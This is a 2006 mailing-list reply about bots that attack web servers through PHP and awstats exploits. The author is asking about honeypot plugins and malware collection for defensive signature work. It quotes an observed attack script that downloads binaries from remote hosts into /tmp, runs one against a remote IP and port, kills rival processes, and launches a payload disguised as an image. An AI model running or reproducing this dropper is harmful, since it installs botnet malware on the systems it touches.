On 21/02/06, Gadi Evron <ge@xxxxxxxxxxxx> wrote: > > Indeed, it has become an annoying trend everybody talks about but nobody > writes about. Trojan horses, worms, etc. exploiting PHP bugs. Either > vulnerabilities in know applications such as WordPress, PHPBB, Drupal, > etc. or actually trying different permutations to attack the site. <snip> > Anyone else seeing their web server logs going crazy with new patterns > every day? Email me, I am starting a sharing system where these can be > shared mutually so we can better protect ourselves, create signatures, etc. I got as far as looking at mwcollect and nepenthes to see if anyone had written plugins to slurp these bots, but couldn't find anything. Typically they're some sort of variant on: #!/bin/bash cd /tmp wget xxx.yy.105.36/ping mv ping cb chmod +x cb ./cb xxx.yyy.233.251 8080 & killall -9 lordnikonz wget xxxx052101/images/logo.jpg mv logo.jpg httpd rm -rf scripz chmod +x httpd export PATH="." httpd with payloads being variously identified as Kaiten, Linux.RST and Lupii by Symantec AV. This is just stuff trying the old awstats exploit, I haven't coded up any handlers for the xml-rpc, or other exploits. So - any handlers/plugins for these? And if so, is anyone (respectable :) collecting the malware? cheers, Jamie
